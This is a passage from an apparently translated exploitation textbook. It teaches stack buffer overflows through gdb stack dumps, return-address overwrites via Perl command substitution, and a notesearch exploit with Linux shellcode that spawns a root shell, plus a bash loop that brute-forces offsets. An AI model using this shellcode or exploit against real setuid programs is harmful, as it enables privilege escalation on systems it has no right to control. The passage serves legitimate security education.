(gdb) break 9
Breakpoint 2 at 0x8048421: file auth_overflow2.c, line 9.
(gdb) break 16
Breakpoint 3 at 0x804846f: file auth_overflow2.c, line 16.
(gdb) run AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Starting program: /home/reader/booksrc/a.out AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Breakpoint 1, main (argc=2, argv=0xbffff874) at auth_overflow2.c:24
24              if(check_authentication(argv[1])) {
(gdb) i r esp
esp            0xbffff7e0       0xbffff7e0
(gdb) x/32xw $esp
0xbffff7e0:     0xb8000ce0      0x08048510      0xbffff848      0xb7eafebc
0xbffff7f0:     0x00000002      0xbffff874      0xbffff880      0xb8001898
0xbffff800:     0x00000000      0x00000001      0x00000001      0x00000000
0xbffff810:     0xb7fd6ff4      0xb8000ce0      0x00000000      0xbffff848
0xbffff820:     0x40f5f7f0      0x48e0fe81      0x00000000      0x00000000
0xbffff830:     0x00000000      0xb7ff9300      0xb7eafded      0xb8000ff4
0xbffff840:     0x00000002      0x08048350      0x00000000      0x08048371
0xbffff850:     0x08048474      0x00000002      0xbffff874      0x08048510 
(gdb)

第一个断点位于main()中调用check_authentication()之前。在这个点上，栈指针寄存器（ESP）是0xbffff7e0，堆栈的顶部如下所示。这都属于main()的栈帧。继续到check_authentication()内部的下一个断点，下面的输出显示 ESP 随着向上移动内存列表而减小，为check_authentication()的栈帧腾出空间（以粗体显示），现在它已经在堆栈上。在找到auth_flag变量（）和变量password_buffer（）的地址后，它们在栈帧中的位置就可以看到了。

(gdb) c
Continuing.

Breakpoint 2, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>) at
auth_overflow2.c:9
9               strcpy(password_buffer, password);
(gdb) i r esp
esp            0xbffff7a0       0xbffff7a0
(gdb) x/32xw $esp
0xbffff7a0:     0x00000000      `0x08049744      0xbffff7b8      0x080482d9`
0xbffff7b0:     `0xb7f9f729      0xb7fd6ff4      0xbffff7e8`    0x00000000
0xbffff7c0:     `0xb7fd6ff4      0xbffff880      0xbffff7e8      0xb7fd6ff4`
0xbffff7d0:     `0xb7ff47b0      0x08048510      0xbffff7e8      0x080484bb`
0xbffff7e0:     `0xbffff9b7`      0x08048510      0xbffff848      0xb7eafebc
0xbffff7f0:     0x00000002      0xbffff874      0xbffff880      0xb8001898
0xbffff800:     0x00000000      0x00000001      0x00000001      0x00000000
0xbffff810:     0xb7fd6ff4      0xb8000ce0      0x00000000      0xbffff848
(gdb) p 0xbffff7e0 - 0xbffff7a0
$1 = 64
(gdb) x/s password_buffer
0xbffff7c0:      "?o??\200????????o???G??\020\205\004\b?????\204\004\b????\020\205\004\
bH???????\002"
(gdb) x/x &auth_flag
0xbffff7bc:     0x00000000
(gdb)

继续到check_authentication()中的第二个断点，当函数被调用时，一个栈帧（以粗体显示）被推入堆栈。由于堆栈向上增长到较低的内存地址，栈指针现在在0xbffff7a0处减少了 64 字节。栈帧的大小和结构可以因函数和某些编译器优化而大不相同。例如，这个栈帧的前 24 字节只是编译器放置的填充。局部栈变量auth_flag和password_buffer在栈帧中的相应内存位置显示。auth_flag（）显示在0xbffff7bc，密码缓冲区的 16 字节（）显示在0xbffff7c0。

栈帧包含的不仅仅是局部变量和填充。下面显示了check_authentication()栈帧的元素。

首先，用斜体显示为局部变量保存的内存。这从auth_flag变量0xbffff7bc开始，一直延续到 16 字节的password_buffer变量的末尾。栈上的下几个值只是编译器添加的填充，以及称为保存的帧指针的东西。如果程序使用优化标志-fomit-frame-pointer编译，则不会在栈帧中使用帧指针。在处，值0x080484bb是栈帧的返回地址，在处，地址0xbffffe9b7是指向包含 30 个A的字符串的指针。这必须是check_authentication()函数的参数。

(gdb) x/32xw $esp
0xbffff7a0:     0x00000000      `0x08049744      0xbffff7b8      0x080482d9`
0xbffff7b0:     `0xb7f9f729      0xb7fd6ff4      0xbffff7e8`      *`0x00000000`*
0xbffff7c0:     *`0xb7fd6ff4      0xbffff880      0xbffff7e8      0xb7fd6ff4`*
0xbffff7d0:     `0xb7ff47b0      0x08048510      0xbffff7e8     ![](https://github.com/OpenDocCN/greenhat-zh/raw/master/docs/hck-art-exp-2e/img/httpatomoreillycomsourcenostarchimages254537.png)0x080484bb`
0xbffff7e0:     0xbffff9b7      0x08048510      0xbffff848      0xb7eafebc
0xbffff7f0:     0x00000002      0xbffff874      0xbffff880      0xb8001898
0xbffff800:     0x00000000      0x00000001      0x00000001      0x00000000
0xbffff810:     0xb7fd6ff4      0xb8000ce0      0x00000000      0xbffff848
(gdb) x/32xb 0xbffff9b7
0xbffff9b7:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbffff9bf:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbffff9c7:     0x41    0x41    0x41    0x41    0x41    0x41    0x41    0x41
0xbffff9cf:     0x41    0x41    0x41    0x41    0x41    0x41    0x00    0x53
(gdb) x/s 0xbffff9b7
0xbffff9b7:      'A' <repeats 30 times> 
(gdb)

通过理解栈帧是如何创建的，可以定位栈帧中的返回地址。这个过程从main()函数开始，甚至在函数调用之前。

(gdb) disass main
Dump of assembler code for function main:
0x08048474 <main+0>:    push   ebp
0x08048475 <main+1>:    mov    ebp,esp
0x08048477 <main+3>:    sub    esp,0x8
0x0804847a <main+6>:    and    esp,0xfffffff0
0x0804847d <main+9>:    mov    eax,0x0
0x08048482 <main+14>:   sub    esp,eax
0x08048484 <main+16>:   cmp    DWORD PTR [ebp+8],0x1
0x08048488 <main+20>:   jg     0x80484ab <main+55>
0x0804848a <main+22>:   mov    eax,DWORD PTR [ebp+12]
0x0804848d <main+25>:   mov    eax,DWORD PTR [eax]
0x0804848f <main+27>:   mov    DWORD PTR [esp+4],eax
0x08048493 <main+31>:   mov    DWORD PTR [esp],0x80485e5
0x0804849a <main+38>:   call   0x804831c <printf@plt>
0x0804849f <main+43>:   mov    DWORD PTR [esp],0x0
0x080484a6 <main+50>:   call   0x804833c <exit@plt>
0x080484ab <main+55>:   mov    eax,DWORD PTR [ebp+12]
0x080484ae <main+58>:   add    eax,0x4
0x080484b1 <main+61>:   mov    eax,DWORD PTR [eax]
`0x080484b3 <main+63>:   mov    DWORD PTR [esp],eax 0x080484b6 <main+66>:   call   0x8048414 <check_authentication>`
0x080484bb <main+71>:   test   eax,eax
0x080484bd <main+73>:   je     0x80484e5 <main+113>
0x080484bf <main+75>:   mov    DWORD PTR [esp],0x80485fb
0x080484c6 <main+82>:   call   0x804831c <printf@plt>
0x080484cb <main+87>:   mov    DWORD PTR [esp],0x8048619
0x080484d2 <main+94>:   call   0x804831c <printf@plt>
0x080484d7 <main+99>:   mov    DWORD PTR [esp],0x8048630
0x080484de <main+106>:  call   0x804831c <printf@plt>
0x080484e3 <main+111>:  jmp    0x80484f1 <main+125>
0x080484e5 <main+113>:  mov    DWORD PTR [esp],0x804864d
0x080484ec <main+120>:  call   0x804831c <printf@plt>
0x080484f1 <main+125>:  leave
0x080484f2 <main+126>:  ret
End of assembler dump.
(gdb)

注意第 131 页上用粗体显示的两行。此时，EAX 寄存器包含第一个命令行参数的指针。这也是check_authentication()函数的参数。第一条汇编指令将 EAX 写入 ESP 所指向的位置（栈顶）。这为check_authentication()函数的函数参数开始了栈帧。第二条指令是实际的调用指令。这条指令将下一条指令的地址压入栈中，并将执行指针寄存器（EIP）移动到check_authentication()函数的开始处。压入栈中的地址是栈帧的返回地址。在这种情况下，下一条指令的地址是0x080484bb，因此这就是返回地址。

(gdb) disass check_authentication
Dump of assembler code for function check_authentication:
`0x08048414 <check_authentication+0>:    push   ebp 0x08048415 <check_authentication+1>:    mov    ebp,esp 0x08048417 <check_authentication+3>:    sub    esp,0x38`

...

0x08048472 <check_authentication+94>:   leave
0x08048473 <check_authentication+95>:   ret
End of assembler dump.
(gdb) p 0x38
$3 = 56
(gdb) p 0x38 + 4 + 4
$4 = 64
(gdb)

当 EIP 改变时，执行将继续进入check_authentication()函数，并且上面用粗体显示的前几条指令完成了栈帧内存的保存。这些指令被称为函数序言。前两条指令用于保存帧指针，第三条指令从 ESP 中减去0x38。这为函数的局部变量保存了 56 个字节。返回地址和保存的帧指针已经压入栈中，并占用了 64 字节栈帧中的额外 8 个字节。

当函数结束时，leave和ret指令移除栈帧，并将执行指针寄存器（EIP）设置为栈帧中保存的返回地址（）。这使程序执行回到main()函数中0x080484bb函数调用之后的下一条指令。这个过程在程序中的任何函数调用时都会发生。

(gdb) x/32xw $esp
0xbffff7a0:     0x00000000      `0x08049744      0xbffff7b8      0x080482d9`
0xbffff7b0:     `0xb7f9f729      0xb7fd6ff4      0xbffff7e8      0x00000000`
0xbffff7c0:     `0xb7fd6ff4      0xbffff880      0xbffff7e8      0xb7fd6ff4`
0xbffff7d0:     `0xb7ff47b0      0x08048510      0xbffff7e8   ![](https://github.com/OpenDocCN/greenhat-zh/raw/master/docs/hck-art-exp-2e/img/httpatomoreillycomsourcenostarchimages254488.png)0x080484bb`
0xbffff7e0:     `0xbffff9b7`      0x08048510      0xbffff848      0xb7eafebc
0xbffff7f0:     0x00000002      0xbffff874      0xbffff880      0xb8001898
0xbffff800:     0x00000000      0x00000001      0x00000001      0x00000000
0xbffff810:     0xb7fd6ff4      0xb8000ce0      0x00000000      0xbffff848
(gdb) cont
Continuing.

Breakpoint 3, check_authentication (password=0xbffff9b7 'A' <repeats 30 times>)
    at auth_overflow2.c:16
16              return auth_flag;
(gdb) x/32xw $esp
0xbffff7a0:     `0xbffff7c0      0x080485dc      0xbffff7b8      0x080482d9`
0xbffff7b0:     `0xb7f9f729      0xb7fd6ff4      0xbffff7e8      0x00000000`
0xbffff7c0:     `0x41414141      0x41414141      0x41414141      0x41414141`
0xbffff7d0:     `0x41414141      0x41414141      0x41414141   ![](https://github.com/OpenDocCN/greenhat-zh/raw/master/docs/hck-art-exp-2e/img/httpatomoreillycomsourcenostarchimages254530.png)0x08004141`
0xbffff7e0:     `0xbffff9b7`      0x08048510      0xbffff848      0xb7eafebc
0xbffff7f0:     0x00000002      0xbffff874      0xbffff880      0xb8001898
0xbffff800:     0x00000000      0x00000001      0x00000001      0x00000000
0xbffff810:     0xb7fd6ff4      0xb8000ce0      0x00000000      0xbffff848
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x08004141 in ?? ()
(gdb)

当保存的返回地址的一些字节被覆盖时，程序仍然会尝试使用该值来恢复执行指针寄存器（EIP）。这通常会导致崩溃，因为执行实际上是在跳转到随机位置。但这个值不一定是随机的。如果覆盖是受控制的，执行可以反过来被控制以跳转到特定位置。但我们应该告诉它去哪里？

尝试使用 BASH

由于黑客技术很大程度上根植于利用和实验，快速尝试不同事情的能力至关重要。BASH 壳和 Perl 在大多数机器上都很常见，并且是进行利用实验所需的一切。

Perl 是一种解释型编程语言，它有一个 print 命令，这个命令恰好非常适合生成长序列的字符。Perl 可以通过使用 -e 开关在命令行上执行指令，如下所示：

reader@hacking:~/booksrc $ perl -e 'print "A" x 20;'
AAAAAAAAAAAAAAAAAAAA

这个命令告诉 Perl 执行单引号之间的命令——在这种情况下，一个命令 print "A" x 20;。这个命令打印字符 A 20 次。

任何字符，例如不可打印字符，也可以通过使用 \x## 来打印，其中 ## 是字符的十六进制值。在下面的例子中，这种表示法用于打印字符 A，其十六进制值为 0x41。

reader@hacking:~/booksrc $ perl -e 'print "\x41" x 20;'
AAAAAAAAAAAAAAAAAAAA

此外，Perl 中可以使用点号 (.) 进行字符串连接。这在将多个地址连接起来时可能很有用。

reader@hacking:~/booksrc $ perl -e 'print "A"x20 . "BCD" . "\x61\x66\x67\x69"x2 . "Z";'
AAAAAAAAAAAAAAAAAAAABCDafgiafgiZ

可以像函数一样执行整个 shell 命令，并返回其输出。这是通过将命令用括号括起来并在前面加美元符号来完成的。以下有两个例子：

reader@hacking:~/booksrc $ $(perl -e 'print "uname";')
Linux
reader@hacking:~/booksrc $ una$(perl -e 'print "m";')e
Linux
reader@hacking:~/booksrc $

在每种情况下，括号中找到的命令的输出被替换为命令，并执行 uname 命令。这个精确的命令替换效果可以通过重音符号（', tilde 键上的倾斜单引号）来实现。你可以使用对你来说更自然的语法；然而，括号语法对大多数人来说更容易阅读。

reader@hacking:~/booksrc $ u`perl -e 'print "na";'`me
Linux
reader@hacking:~/booksrc $ u$(perl -e 'print "na";')me
Linux
reader@hacking:~/booksrc $

可以结合使用命令替换和 Perl 来快速生成动态的溢出缓冲区。你可以使用这种技术轻松地测试具有精确长度的缓冲区的 overflow_example.c 程序。

reader@hacking:~/booksrc $ ./overflow_example $(perl -e 'print "A"x30')
[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'
[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)

[STRCPY] copying 30 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff7e0 and contains 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAAAAAAAAAAAA'
[AFTER] value is at 0xbffff7f4 and is 1094795585 (0x41414141)
Segmentation fault (core dumped)
reader@hacking:~/booksrc $ gdb -q
(gdb) print 0xbffff7f4 - 0xbffff7e0
$1 = 20

(gdb) quit
reader@hacking:~/booksrc $ ./overflow_example $(perl -e 'print "A"x20 . "ABCD"')
[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'
[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)

[STRCPY] copying 24 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff7e0 and contains 'AAAAAAAAAAAAAAAAAAAAABCD'
[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAAABCD'
[AFTER] value is at 0xbffff7f4 and is 1145258561 (0x44434241) 
reader@hacking:~/booksrc $

在上面的输出中，GDB 被用作十六进制计算器来计算 buffer_two (0xbfffff7e0) 和 value 变量 (0xbffff7f4) 之间的距离，结果为 20 字节。使用这个距离，value 变量被覆盖为确切的值 0x44434241，因为字符 A, B, C 和 D 的十六进制值分别为 0x41, 0x42, 0x43 和 0x44。第一个字符是最不显著的字节，因为是小端架构。这意味着如果你想要用确切的东西控制 value 变量，比如 oxdeadbeef，你必须以相反的顺序将这些字节写入内存。

reader@hacking:~/booksrc $ ./overflow_example $(perl -e 'print "A"x20 .
 "\xef\xbe\xad\xde"')
[BEFORE] buffer_two is at 0xbffff7e0 and contains 'two'
[BEFORE] buffer_one is at 0xbffff7e8 and contains 'one'
[BEFORE] value is at 0xbffff7f4 and is 5 (0x00000005)

[STRCPY] copying 24 bytes into buffer_two

[AFTER] buffer_two is at 0xbffff7e0 and contains 'AAAAAAAAAAAAAAAAAAAA??'
[AFTER] buffer_one is at 0xbffff7e8 and contains 'AAAAAAAAAAAA??'
[AFTER] value is at 0xbffff7f4 and is -559038737 (0xdeadbeef)
reader@hacking:~/booksrc $

这种技术可以应用于用确切值覆盖 auth_overflow2.c 程序中的返回地址。在下面的例子中，我们将覆盖main()中的不同地址的返回地址。

reader@hacking:~/booksrc $ gcc -g -o auth_overflow2 auth_overflow2.c 
reader@hacking:~/booksrc $ gdb -q ./auth_overflow2
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disass main
Dump of assembler code for function main:
0x08048474 <main+0>:    push   ebp
0x08048475 <main+1>:    mov    ebp,esp
0x08048477 <main+3>:    sub    esp,0x8
0x0804847a <main+6>:    and    esp,0xfffffff0
0x0804847d <main+9>:    mov    eax,0x0
0x08048482 <main+14>:   sub    esp,eax
0x08048484 <main+16>:   cmp    DWORD PTR [ebp+8],0x1
0x08048488 <main+20>:   jg     0x80484ab <main+55>
0x0804848a <main+22>:   mov    eax,DWORD PTR [ebp+12]
0x0804848d <main+25>:   mov    eax,DWORD PTR [eax]
0x0804848f <main+27>:   mov    DWORD PTR [esp+4],eax
0x08048493 <main+31>:   mov    DWORD PTR [esp],0x80485e5
0x0804849a <main+38>:   call   0x804831c <printf@plt>
0x0804849f <main+43>:   mov    DWORD PTR [esp],0x0
0x080484a6 <main+50>:   call   0x804833c <exit@plt>
0x080484ab <main+55>:   mov    eax,DWORD PTR [ebp+12]
0x080484ae <main+58>:   add    eax,0x4
0x080484b1 <main+61>:   mov    eax,DWORD PTR [eax]
0x080484b3 <main+63>:   mov    DWORD PTR [esp],eax
0x080484b6 <main+66>:   call   0x8048414 <check_authentication>
0x080484bb <main+71>:   test   eax,eax
0x080484bd <main+73>:   je     0x80484e5 <main+113>
`0x080484bf <main+75>:   mov    DWORD PTR [esp],0x80485fb 0x080484c6 <main+82>:   call   0x804831c <printf@plt> 0x080484cb <main+87>:   mov    DWORD PTR [esp],0x8048619 0x080484d2 <main+94>:   call   0x804831c <printf@plt> 0x080484d7 <main+99>:   mov    DWORD PTR [esp],0x8048630 0x080484de <main+106>:  call   0x804831c <printf@plt>`
0x080484e3 <main+111>:  jmp    0x80484f1 <main+125>
0x080484e5 <main+113>:  mov    DWORD PTR [esp],0x804864d
0x080484ec <main+120>:  call   0x804831c <printf@plt>
0x080484f1 <main+125>:  leave
0x080484f2 <main+126>:  ret
End of assembler dump.
(gdb)

在粗体显示的这段代码中，包含了显示“访问已允许”信息的指令。该部分的起始地址为0x080484bf，因此如果返回地址被覆盖为这个值，这段指令就会被执行。由于不同的编译器版本和不同的优化标志，返回地址与password_buffer起始地址之间的确切距离可能会变化。只要缓冲区的起始地址与堆栈上的 DWORD 对齐，这种可变性可以通过简单地多次重复返回地址来解释。这样，至少有一个实例会覆盖返回地址，即使它由于编译器优化而发生了偏移。

reader@hacking:~/booksrc $ ./auth_overflow2 $(perl -e 'print "\xbf\x84\x04\x08"x10')

-=-=-=-=-=-=-=-=-=-=-=-=-=-
      Access Granted.
-=-=-=-=-=-=-=-=-=-=-=-=-=-
Segmentation fault (core dumped)
reader@hacking:~/booksrc $

在上面的例子中，将0x080484bf的目标地址重复了 10 次，以确保返回地址被新的目标地址覆盖。当check_authentication()函数返回时，执行会直接跳转到新的目标地址，而不是返回到调用之后的下一个指令。这给了我们更多的控制权；然而，我们仍然局限于使用原始编程中存在的指令。

notesearch 程序在粗体标记的这一行上容易受到缓冲区溢出的影响。

int main(int argc, char *argv[]) {
   int userid, printing=1, fd; // File descriptor
   char searchstring[100];

   if(argc > 1)                        // If there is an arg
      `strcpy(searchstring, argv[1]);`   //   that is the search string;
   else                                // otherwise,
      searchstring[0] = 0;             //   search string is empty.

notesearch 漏洞利用采用了类似的技巧来溢出缓冲区到返回地址；然而，它还会将自身的指令注入到内存中，然后从那里返回执行。这些指令被称为shellcode，它们指示程序恢复权限并打开一个 shell 提示符。这对于 notesearch 程序来说尤其致命，因为它具有 suid root 权限。由于这个程序期望多用户访问，它以更高的权限运行，以便访问其数据文件，但程序逻辑阻止用户使用这些更高的权限进行除访问数据文件之外的其他操作——至少这是预期意图。

但是，当可以注入新指令并且可以通过缓冲区溢出来控制执行时，程序逻辑就变得无关紧要了。这种技术允许程序执行它从未被编程去执行的事情，同时它仍然以提升的权限运行。这是 notesearch 漏洞利用能够获得 root shell 的危险组合。让我们进一步研究这个漏洞利用。

reader@hacking:~/booksrc $ gcc -g exploit_notesearch.c
reader@hacking:~/booksrc $ gdb -q ./a.out
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) list 1
1       #include <stdio.h>
2       #include <stdlib.h>
3       #include <string.h>
4       char shellcode[]=
5       "\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
6       "\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
7       "\xe1\xcd\x80";
8
9       int main(int argc, char *argv[]) {
10         unsigned int i, *ptr, ret, offset=270;
(gdb)
11         char *command, *buffer;
12
13         command = (char *) malloc(200);
14         bzero(command, 200); // Zero out the new memory.
15
16         strcpy(command, "./notesearch \'"); // Start command buffer.
17         buffer = command + strlen(command); // Set buffer at the end.
18
19         if(argc > 1) // Set offset.
20            offset = a toi(argv[1]);
(gdb)
21
22         ret = (unsigned int) &i - offset; // Set return address.
23
`24         for(i=0; i < 160; i+=4)` // Fill buffer with return address.
`25            *((unsigned int *)(buffer+i)) = ret; 26         memset(buffer, 0x90, 60);`  // Build NOP sled.
`27         memcpy(buffer+60, shellcode, sizeof(shellcode)-1);`
28
29         strcat(command, "\'");
30
(gdb) break 26
Breakpoint 1 at 0x80485fa: file exploit_notesearch.c, line 26.
(gdb) break 27
Breakpoint 2 at 0x8048615: file exploit_notesearch.c, line 27.
(gdb) break 28
Breakpoint 3 at 0x8048633: file exploit_notesearch.c, line 28.
(gdb)

notesearch 漏洞利用在 24 到 27 行（如上粗体所示）生成一个缓冲区。第一部分是一个 for 循环，它使用存储在ret变量中的 4 字节地址填充缓冲区。每次循环，i增加 4。这个值被加到缓冲区地址上，整个内容被转换为无符号整数指针。这个大小为 4，所以当整个内容被解引用时，ret中找到的整个 4 字节值将被写入。

(gdb) run
Starting program: /home/reader/booksrc/a.out

Breakpoint 1, main (argc=1, argv=0xbffff894) at exploit_notesearch.c:26
26         memset(buffer, 0x90, 60); // build NOP sled
(gdb) x/40x buffer
0x804a016:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a026:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a036:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a046:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a056:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a066:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a076:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a086:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a096:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a0a6:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
(gdb) x/s command
0x804a008:       "./notesearch
'¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶û
ÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"
(gdb)

在第一个断点处，缓冲区指针显示了 for 循环的结果。你还可以看到命令指针和缓冲区指针之间的关系。下一条指令是调用memset()，它从缓冲区的开始处开始，将 60 个字节的内存设置为值0x90。

(gdb) cont
Continuing.

Breakpoint 2, main (argc=1, argv=0xbffff894) at exploit_notesearch.c:27
27         memcpy(buffer+60, shellcode, sizeof(shellcode)-1); 
(gdb) x/40x buffer
0x804a016:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a026:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a036:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a046:      0x90909090      0x90909090      0x90909090      0xbffff6f6
0x804a056:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a066:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a076:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a086:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a096:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a0a6:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
(gdb) x/s command 
0x804a008:       "./notesearch '", '\220' <repeats 60 times>, "¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿
¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"
(gdb)

最后，memcpy()的调用将 shellcode 字节复制到buffer+60。

(gdb) cont
Continuing.

Breakpoint 3, main (argc=1, argv=0xbffff894) at exploit_notesearch.c:29
29         strcat(command, "\'");
(gdb) x/40x buffer
0x804a016:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a026:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a036:      0x90909090      0x90909090      0x90909090      0x90909090
0x804a046:      0x90909090      0x90909090      0x90909090      0x3158466a
0x804a056:      0xcdc931db      0x2f685180      0x6868732f      0x6e69622f
0x804a066:      0x5351e389      0xb099e189      0xbf80cd0b      0xbffff6f6
0x804a076:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a086:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a096:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
0x804a0a6:      0xbffff6f6      0xbffff6f6      0xbffff6f6      0xbffff6f6
(gdb) x/s command
0x804a008:       "./notesearch '", '\220' <repeats 60 times>, "1À1Û1É\231°gÍ\200j\vXQh//shh/
bin\211ãQ\211âS\211áÍ\200¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿¶ûÿ¿"
(gdb)

现在缓冲区包含所需的 shellcode，并且足够长，可以覆盖返回地址。通过使用重复的返回地址技术，找到返回地址的确切位置变得容易。但是，这个返回地址必须指向同一缓冲区中位于 shellcode 的位置。这意味着实际的地址必须在它进入内存之前就预先知道。在动态变化的堆栈上尝试做出这样的预测可能很困难。幸运的是，还有一种称为 NOP 滑梯的黑客技术，可以帮助完成这项困难的诡计。"NOP"是一种汇编指令，代表"无操作"。它是一个单字节指令，什么都不做。这些指令有时用于浪费计算周期以达到定时目的，在 Sparc 处理器架构中，由于指令流水线，这些指令实际上是必要的。在这种情况下，NOP 指令将被用于不同的目的：作为调整因素。我们将创建一个由这些 NOP 指令组成的大数组（或滑梯），并将其放置在 shellcode 之前；然后，如果 EIP 寄存器指向 NOP 滑梯中找到的任何地址，它将在执行每个 NOP 指令时逐个递增，直到最终到达 shellcode。这意味着只要返回地址被覆盖为 NOP 滑梯中找到的任何地址，EIP 寄存器就会沿着滑梯滑到 shellcode，并正确执行。在x86 架构上，NOP 指令相当于十六进制字节 0x90。这意味着我们的完成后的漏洞缓冲区看起来可能像这样：

图 0x300-2。

即使有 NOP 滑梯，也必须在事先预测内存中缓冲区的近似位置。一种近似内存位置的技术是使用附近的堆栈位置作为参考框架。通过从这个位置减去一个偏移量，可以获取任何变量的相对地址。

在 BASH 中进行实验

从 exploit_notesearch.c

  unsigned int i, *ptr, ret, offset=270;
  char *command, *buffer;

  command = (char *) malloc(200);
  bzero(command, 200); // Zero out the new memory.

  strcpy(command, "./notesearch \'"); // Start command buffer.
  buffer = command + strlen(command); // Set buffer at the end.

  if(argc > 1) // Set offset.
    offset = atoi(argv[1]);

  ret = (unsigned int) &i - offset; // Set return address.

在 notesearch 漏洞利用中，main()堆栈帧中变量i的地址被用作参考点。然后从这个值中减去一个偏移量；结果是目标返回地址。这个偏移量之前被确定为 270，但这个数字是如何计算的呢？

确定这个偏移量最简单的方法是进行实验。调试器会稍微移动内存，并在执行 suid root notesearch 程序时降级权限，这使得在这种情况下调试变得非常无用。

由于 notesearch 漏洞利用允许通过命令行参数定义偏移量，因此可以快速测试不同的偏移量。

reader@hacking:~/booksrc $ gcc exploit_notesearch.c
reader@hacking:~/booksrc $ ./a.out 100
-------[ end of note data ]-------
reader@hacking:~/booksrc $ ./a.out 200
-------[ end of note data ]-------
reader@hacking:~/booksrc $

然而，手动做这件事既繁琐又愚蠢。BASH 还有一个 for 循环可以用来自动化这个过程。seq命令是一个简单的程序，用于生成数字序列，通常与循环一起使用。

reader@hacking:~/booksrc $ seq 1 10
1
2
3
4
5
6
7
8
9
10
reader@hacking:~/booksrc $ seq 1 3 10
1
4
7
10
reader@hacking:~/booksrc $

当只使用两个参数时，会生成从第一个参数到第二个参数的所有数字。当使用三个参数时，中间的参数决定了每次增加的量。这可以与命令替换一起使用，以驱动 BASH 的 for 循环。

reader@hacking:~/booksrc $ for i in $(seq 1 3 10)
> do
> echo The value is $i
> done
The value is 1
The value is 4
The value is 7
The value is 10
reader@hacking:~/booksrc $

for 循环的功能应该很熟悉，即使语法略有不同。shell 变量$i遍历由seq生成的所有值。然后，在do和done关键字之间执行所有内容。这可以用来快速测试许多不同的偏移量。由于 NOP sled 长度为 60 字节，并且我们可以在 sled 上的任何位置返回，因此大约有 60 字节的调整空间。我们可以安全地以 30 为步长递增偏移量循环，而不用担心错过 sled。

reader@hacking:~/booksrc $ for i in $(seq 0 30 300)
> do
> echo Trying offset $i
> ./a.out $i
> done
Trying offset 0
[DEBUG] found a 34 byte note for user id 999
[DEBUG] found a 41 byte note for user id 999

